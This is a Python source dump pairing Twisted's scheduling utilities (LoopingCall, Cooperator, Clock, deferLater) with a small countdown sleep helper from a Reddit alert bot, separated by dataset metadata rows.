from twisted.internet import base, defer
from twisted.internet.interfaces import IReactorTime
class LoopingCall:
"""Call a function repeatedly.
If C{f} returns a deferred, rescheduling will not take place until the
deferred has fired. The result value is ignored.
@ivar f: The function to call.
@ivar a: A tuple of arguments to pass the function.
@ivar kw: A dictionary of keyword arguments to pass to the function.
@ivar clock: A provider of
L{twisted.internet.interfaces.IReactorTime}. The default is
L{twisted.internet.reactor}. Feel free to set this to
something else, but it probably ought to be set *before*
calling L{start}.
@type _lastTime: C{float}
@ivar _lastTime: The time at which this instance most recently scheduled
itself to run.
"""
call = None
running = False
deferred = None
interval = None
_lastTime = 0.0
starttime = None
def __init__(self, f, *a, **kw):
self.f = f
self.a = a
self.kw = kw
from twisted.internet import reactor
self.clock = reactor
def start(self, interval, now=True):
"""Start running function every interval seconds.
@param interval: The number of seconds between calls. May be
less than one. Precision will depend on the underlying
platform, the available hardware, and the load on the system.
@param now: If True, run this call right now. Otherwise, wait
until the interval has elapsed before beginning.
@return: A Deferred whose callback will be invoked with
C{self} when C{self.stop} is called, or whose errback will be
invoked when the function raises an exception or returned a
deferred that has its errback invoked.
"""
assert not self.running, ("Tried to start an already running "
"LoopingCall.")
if interval < 0:
raise ValueError, "interval must be >= 0"
self.running = True
d = self.deferred = defer.Deferred()
self.starttime = self.clock.seconds()
self._lastTime = self.starttime
self.interval = interval
if now:
self()
else:
self._reschedule()
return d
def stop(self):
"""Stop running function.
"""
assert self.running, ("Tried to stop a LoopingCall that was "
"not running.")
self.running = False
if self.call is not None:
self.call.cancel()
self.call = None
d, self.deferred = self.deferred, None
d.callback(self)
def __call__(self):
def cb(result):
if self.running:
self._reschedule()
else:
d, self.deferred = self.deferred, None
d.callback(self)
def eb(failure):
self.running = False
d, self.deferred = self.deferred, None
d.errback(failure)
self.call = None
d = defer.maybeDeferred(self.f, *self.a, **self.kw)
d.addCallback(cb)
d.addErrback(eb)
def _reschedule(self):
"""
Schedule the next iteration of this looping call.
"""
if self.interval == 0:
self.call = self.clock.callLater(0, self)
return
currentTime = self.clock.seconds()
# Find how long is left until the interval comes around again.
untilNextTime = (self._lastTime - currentTime) % self.interval
# Make sure it is in the future, in case more than one interval worth
# of time passed since the previous call was made.
nextTime = max(
self._lastTime + self.interval, currentTime + untilNextTime)
# If the interval falls on the current time exactly, skip it and
# schedule the call for the next interval.
if nextTime == currentTime:
nextTime += self.interval
self._lastTime = nextTime
self.call = self.clock.callLater(nextTime - currentTime, self)
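    # Illustrative aside (not part of Twisted): a worked example of the
    # arithmetic above with interval = 5, _lastTime = 10 and a current clock
    # reading of 23 (two beats were missed while a slow call ran):
    #   untilNextTime = (10 - 23) % 5 == 2
    #   nextTime      = max(10 + 5, 23 + 2) == 25
    # so the next call stays on the original 5-second grid (10, 15, 20, 25)
    # and the missed beats are skipped rather than fired in a burst.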
def __repr__(self):
if hasattr(self.f, 'func_name'):
func = self.f.func_name
if hasattr(self.f, 'im_class'):
func = self.f.im_class.__name__ + '.' + func
else:
func = reflect.safe_repr(self.f)
return 'LoopingCall<%r>(%s, *%s, **%s)' % (
self.interval, func, reflect.safe_repr(self.a),
reflect.safe_repr(self.kw))
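# Illustrative aside (not part of this module): a minimal LoopingCall usage
# sketch, assuming the standard reactor.
#
#     from twisted.internet import reactor, task
#
#     def heartbeat():
#         print 'still alive'           # Python 2 syntax, matching this file
#
#     loop = task.LoopingCall(heartbeat)
#     loop.start(2.5)                   # runs immediately, then every 2.5 s
#     reactor.callLater(10, loop.stop)  # the Deferred from start() then fires
#     reactor.run()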
class SchedulerStopped(Exception):
"""
The operation could not complete because the scheduler was stopped in
progress or was already stopped.
"""
class _Timer(object):
MAX_SLICE = 0.01
def __init__(self):
self.end = time.time() + self.MAX_SLICE
def __call__(self):
return time.time() >= self.end
_EPSILON = 0.00000001
def _defaultScheduler(x):
from twisted.internet import reactor
return reactor.callLater(_EPSILON, x)
class Cooperator(object):
"""
Cooperative task scheduler.
"""
def __init__(self,
terminationPredicateFactory=_Timer,
scheduler=_defaultScheduler,
started=True):
"""
Create a scheduler-like object to which iterators may be added.
@param terminationPredicateFactory: A no-argument callable which will
be invoked at the beginning of each step and should return a
no-argument callable which will return False when the step should be
terminated. The default factory is time-based and allows iterators to
run for 1/100th of a second at a time.
@param scheduler: A one-argument callable which takes a no-argument
callable and should invoke it at some future point. This will be used
to schedule each step of this Cooperator.
@param started: A boolean which indicates whether iterators should be
stepped as soon as they are added, or if they will be queued up until
L{Cooperator.start} is called.
"""
self.iterators = []
self._metarator = iter(())
self._terminationPredicateFactory = terminationPredicateFactory
self._scheduler = scheduler
self._delayedCall = None
self._stopped = False
self._started = started
def coiterate(self, iterator, doneDeferred=None):
"""
Add an iterator to the list of iterators I am currently running.
@return: a Deferred that will fire when the iterator finishes.
"""
if doneDeferred is None:
doneDeferred = defer.Deferred()
if self._stopped:
doneDeferred.errback(SchedulerStopped())
return doneDeferred
self.iterators.append((iterator, doneDeferred))
self._reschedule()
return doneDeferred
def _tasks(self):
terminator = self._terminationPredicateFactory()
while self.iterators:
for i in self._metarator:
yield i
if terminator():
return
self._metarator = iter(self.iterators)
def _tick(self):
"""
Run one scheduler tick.
"""
self._delayedCall = None
for taskObj in self._tasks():
iterator, doneDeferred = taskObj
try:
result = iterator.next()
except StopIteration:
self.iterators.remove(taskObj)
doneDeferred.callback(iterator)
except:
self.iterators.remove(taskObj)
doneDeferred.errback()
else:
if isinstance(result, defer.Deferred):
self.iterators.remove(taskObj)
def cbContinue(result, taskObj=taskObj):
self.coiterate(*taskObj)
result.addCallbacks(cbContinue, doneDeferred.errback)
self._reschedule()
_mustScheduleOnStart = False
def _reschedule(self):
if not self._started:
self._mustScheduleOnStart = True
return
if self._delayedCall is None and self.iterators:
self._delayedCall = self._scheduler(self._tick)
def start(self):
"""
Begin scheduling steps.
"""
self._stopped = False
self._started = True
if self._mustScheduleOnStart:
del self._mustScheduleOnStart
self._reschedule()
def stop(self):
"""
Stop scheduling steps. Errback the completion Deferreds of all
iterators which have been added and forget about them.
"""
self._stopped = True
for iterator, doneDeferred in self.iterators:
doneDeferred.errback(SchedulerStopped())
self.iterators = []
if self._delayedCall is not None:
self._delayedCall.cancel()
self._delayedCall = None
_theCooperator = Cooperator()
def coiterate(iterator):
"""
Cooperatively iterate over the given iterator, dividing runtime between it
and all other iterators which have been passed to this function and not yet
exhausted.
"""
return _theCooperator.coiterate(iterator)
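# Illustrative aside (not part of this module): coiterate() shares reactor time
# between long-running generators; the helpers below are hypothetical.
#
#     def count_slowly(n):
#         for i in xrange(n):
#             do_a_little_work(i)   # hypothetical unit of work
#             yield None            # give other iterators a turn
#
#     d = coiterate(count_slowly(1000000))
#     d.addCallback(lambda _: report_done())   # hypothetical callback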
class Clock:
"""
Provide a deterministic, easily-controlled implementation of
L{IReactorTime.callLater}. This is commonly useful for writing
deterministic unit tests for code which schedules events using this API.
"""
implements(IReactorTime)
rightNow = 0.0
def __init__(self):
self.calls = []
def seconds(self):
"""
Pretend to be time.time(). This is used internally when an operation
        such as L{IDelayedCall.reset} needs to determine a time value
relative to the current time.
@rtype: C{float}
@return: The time which should be considered the current time.
"""
return self.rightNow
def callLater(self, when, what, *a, **kw):
"""
See L{twisted.internet.interfaces.IReactorTime.callLater}.
"""
dc = base.DelayedCall(self.seconds() + when,
what, a, kw,
self.calls.remove,
lambda c: None,
self.seconds)
self.calls.append(dc)
self.calls.sort(lambda a, b: cmp(a.getTime(), b.getTime()))
return dc
def getDelayedCalls(self):
"""
See L{twisted.internet.interfaces.IReactorTime.getDelayedCalls}
"""
return self.calls
def advance(self, amount):
"""
Move time on this clock forward by the given amount and run whatever
pending calls should be run.
@type amount: C{float}
@param amount: The number of seconds which to advance this clock's
time.
"""
self.rightNow += amount
while self.calls and self.calls[0].getTime() <= self.seconds():
call = self.calls.pop(0)
call.called = 1
call.func(*call.args, **call.kw)
def pump(self, timings):
"""
Advance incrementally by the given set of times.
@type timings: iterable of C{float}
"""
for amount in timings:
self.advance(amount)
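# Illustrative aside (not part of this module): Clock makes time-based code
# testable without real waiting.
#
#     c = Clock()
#     fired = []
#     c.callLater(5, fired.append, 'ping')
#     c.advance(4.9)   # nothing happens yet
#     c.advance(0.2)   # the call runs now: fired == ['ping']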
def deferLater(clock, delay, callable, *args, **kw):
"""
Call the given function after a certain period of time has passed.
@type clock: L{IReactorTime} provider
@param clock: The object which will be used to schedule the delayed
call.
@type delay: C{float} or C{int}
@param delay: The number of seconds to wait before calling the function.
@param callable: The object to call after the delay.
@param *args: The positional arguments to pass to C{callable}.
@param **kw: The keyword arguments to pass to C{callable}.
@rtype: L{defer.Deferred}
@return: A deferred that fires with the result of the callable when the
specified time has elapsed.
"""
d = defer.Deferred()
d.addCallback(lambda ignored: callable(*args, **kw))
clock.callLater(delay, d.callback, None)
return d
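# Illustrative aside (not part of this module): deferLater() wraps "call this
# later and give me a Deferred for the result", e.g.
#
#     from twisted.internet import reactor
#     d = deferLater(reactor, 3.0, pow, 2, 10)
#     d.addCallback(handle_result)   # hypothetical callback, receives 1024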
__all__ = [
'LoopingCall',
'Clock',
'SchedulerStopped', 'Cooperator', 'coiterate',
'deferLater',
]
| 30.087886 | 79 | 0.604642 |
4a1b73a828ab40ba69413776a541842602a275e0
| 765 |
py
|
Python
|
src/bot_modules/sleep_handler.py
|
mastershakej/Reddit-Alert-Bot
|
7da02afb718d22ded634670785b9ce5f03496925
|
[
"MIT"
] | null | null | null |
src/bot_modules/sleep_handler.py
|
mastershakej/Reddit-Alert-Bot
|
7da02afb718d22ded634670785b9ce5f03496925
|
[
"MIT"
] | null | null | null |
src/bot_modules/sleep_handler.py
|
mastershakej/Reddit-Alert-Bot
|
7da02afb718d22ded634670785b9ce5f03496925
|
[
"MIT"
] | null | null | null |
from sys import stdout
import time
class SleepHandler:
@staticmethod
def sleep(seconds):
digits = len(str(seconds))
seconds += 1
for i in range(1, seconds):
stdout.write('\r')
if i % 4 == 0:
stdout.write('Sleeping (' + str(seconds - i).zfill(digits) + ')')
elif i % 4 == 1:
stdout.write('Sleeping (' + str(seconds - i).zfill(digits) + ')')
elif i % 4 == 2:
stdout.write('Sleeping (' + str(seconds - i).zfill(digits) + ')')
elif i % 4 == 3:
stdout.write('Sleeping (' + str(seconds - i).zfill(digits) + ')')
stdout.flush()
time.sleep(1)
stdout.write('\r')
stdout.flush()
| 34.772727 | 81 | 0.477124 |